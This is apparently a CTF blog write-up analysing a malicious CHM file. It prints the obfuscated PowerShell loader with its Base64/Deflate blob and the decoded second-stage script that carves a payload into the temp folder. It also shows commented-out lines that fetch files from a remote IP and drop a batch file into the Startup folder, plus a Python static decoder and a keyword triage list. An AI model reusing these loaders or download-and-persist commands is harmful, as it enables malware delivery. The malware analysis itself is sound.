Inspecting the file requires a CHM unpacker (CHMUnpacker); unpacking it yields three files.
doc.hhc and doc1.htm contain nothing of note. doc.html contains a chunk of PowerShell that is triggered by a click handler in JavaScript; together with the page title "Check for Windows updates from Command Line", this is clearly a phishing page.
Decoding the Base64 in the middle of the PowerShell gives:
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nZFda8IwFIbvB/6HUCsom7HthrMdu3B+gDCnWIcXyxhpe9SONgnp0eq/X2sr2/VyGd485zl5m8QMkxgEkmciIO/K4BtCJP45Q0jpGyDdQDC6JJ4aN81rmo5lLhLJo2mcQNvYIyqv17Ndh9r9Ae271HZcb2BZVi+GRO4kVWJn3BHDBHH0CrLqOZZj3bv2I8VUGZ1/ob/W86XtlNjWuz9ZLVeL6ex10mJDpcYcOVtJnsZix+ZxqGUmt8g2sYhknjEfuUYyB3FgSy13mqf13UGxPSQKNA04llqlmAYekW1h07gxQymw+q2P2YKWip+etyoCwyRZwwnbhqnyiEUypOE+LQlmHJ3sIn99SmcigtNi2zZO9anmmNXgv0n/EGSoixXaFeSWDDq1QylQlzSS4ggaC4+plukLz6D/4NfPKuaF7wN2R7X9bw+s7MG2HefSQzWadCcilFEBIMEZi61/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
Base64-decoding the string in the middle directly only gives gibberish, because it is Deflate-compressed.
Stepping through the IO.Compression.DeflateStream call and decompressing the data yields the actual script.
It reads doc.chm from PowerShell's current directory, then writes 20201122.tmp into the system temp directory:
# $client = new-object System.Net.WebClient;
# $client.DownloadFile("http://192.168.69.129:8000/ielogo.png", "$env:temp/20203917.tmp")
# $client.DownloadFile("http://192.168.69.129:8000/_TMP12", "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.bat")
# read file
$content = [IO.File]::ReadAllText("$pwd\doc.chm")
$idx1 = $content.IndexOf("xxxxxxxx")
$helper = $content.Substring($idx1 + 8)
$cont = [System.Convert]::FromBase64String($helper)
Set-Content "$env:temp\20201122.tmp" $cont -Encoding byte
Save this code into a .ps1 script, rename the downloaded challenge file to doc.chm, run the script, and pick up 20201122.tmp from the local temp directory.
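The two steps above (inflating the Base64/Deflate stage-1 loader, then carving the Base64 blob that follows the "xxxxxxxx" marker in doc.chm) can be done statically without ever passing the script to Invoke-Expression. The following Python decoder is an added example and not part of the original write-up; the loader text, the CHM bytes and the second-stage payload it works on are constructed samples built inside the script, and the indicator keyword list is my own choice.

```python
import base64
import re
import zlib

# --- constructed sample data (stands in for doc.html / doc.chm; not from the CTF file) ---
SAMPLE_SCRIPT = (
    '$content = [IO.File]::ReadAllText("$pwd\\doc.chm")\n'
    '$idx1 = $content.IndexOf("xxxxxxxx")\n'
    '$helper = $content.Substring($idx1 + 8)\n'
    '$cont = [System.Convert]::FromBase64String($helper)\n'
    'Set-Content "$env:temp\\20201122.tmp" $cont -Encoding byte\n'
)


def make_stage1_blob(script: str) -> str:
    """Encode a script the way the loader expects it: raw DEFLATE, then Base64."""
    # .NET DeflateStream emits raw DEFLATE with no zlib header -> wbits=-15
    comp = zlib.compressobj(level=9, wbits=-15)
    data = comp.compress(script.encode("ascii")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


SAMPLE_STAGE1_B64 = make_stage1_blob(SAMPLE_SCRIPT)
# Same Invoke-Expression / DeflateStream wrapper shape as the page, constructed payload inside.
SAMPLE_LOADER = (
    "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object "
    "IO.Compression.DeflateStream ($(New-Object IO.MemoryStream "
    f"(,$([Convert]::FromBase64String('{SAMPLE_STAGE1_B64}')))), "
    "[IO.Compression.CompressionMode]::Decompress)), "
    "[Text.Encoding]::ASCII)).ReadToEnd();"
)
SAMPLE_STAGE2 = b"MZ\x90\x00constructed-stage2-payload"
# "ITSF" is the real CHM magic; the rest is padding, then the marker and the Base64 tail.
SAMPLE_CHM = (
    b"ITSF\x03\x00" + b"\x00" * 16
    + b"xxxxxxxx" + base64.b64encode(SAMPLE_STAGE2) + b"\r\n"
)

B64_LITERAL_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")

# Strings an analyst would flag in the inflated script (my own list, not from the page).
SUSPICIOUS = (
    "Invoke-Expression",
    "DownloadFile",
    "Start Menu\\Programs\\Startup",
    "FromBase64String",
    "Set-Content",
    "$env:temp",
)


def extract_stage1_b64(loader: str) -> str:
    """Pull the Base64 literal out of the FromBase64String('...') call."""
    m = B64_LITERAL_RE.search(loader)
    if not m:
        raise ValueError("no FromBase64String('...') literal found")
    return m.group(1)


def decode_stage1(b64_blob: str) -> str:
    """Base64-decode, then inflate raw DEFLATE, i.e. what DeflateStream + ReadToEnd did."""
    raw = base64.b64decode(b64_blob)
    return zlib.decompress(raw, wbits=-15).decode("ascii")


def carve_stage2(chm_bytes: bytes, marker: bytes = b"xxxxxxxx") -> bytes:
    """Mirror IndexOf/Substring/FromBase64String on bytes: everything after the marker is Base64."""
    idx = chm_bytes.find(marker)
    if idx < 0:
        raise ValueError("marker not found in file")
    tail = chm_bytes[idx + len(marker):]
    # Like [Convert]::FromBase64String, non-alphabet bytes (CR/LF) are ignored by default.
    return base64.b64decode(tail)


def indicators(script: str) -> list:
    """Return the SUSPICIOUS keywords present in the decoded script, in list order."""
    return [s for s in SUSPICIOUS if s in script]


def analyse(loader: str, chm_bytes: bytes) -> dict:
    """Run the whole static pipeline and summarise what was recovered."""
    script = decode_stage1(extract_stage1_b64(loader))
    stage2 = carve_stage2(chm_bytes)
    return {
        "script": script,
        "indicators": indicators(script),
        "stage2_len": len(stage2),
        "stage2_is_pe": stage2.startswith(b"MZ"),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_LOADER, SAMPLE_CHM)
    print(result["script"])
    print("indicators:", result["indicators"])
    print("stage2 bytes:", result["stage2_len"], "PE header:", result["stage2_is_pe"])
```

Working on the raw bytes of the CHM (rather than ReadAllText's text decoding) avoids any codepage surprises in the binary part of the file; only the Base64 tail after the marker matters, and both .NET's FromBase64String and Python's b64decode skip the trailing CR/LF. The indicator list is a convenience for triage, not a detection rule.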
Loading 20201122.tmp into IDA, functions only show up when it is analysed as 32-bit. Most of them are broken and there are not many; going through them one by one I found no main function. The header is damaged and would need to be repaired.
Couldn't get it repaired. Giving up.
Tags: tmp, reverse, temp, doc, CTF, html, IO, 20201122, Compression From: https://www.cnblogs.com/blackicelisa/p/16655645.html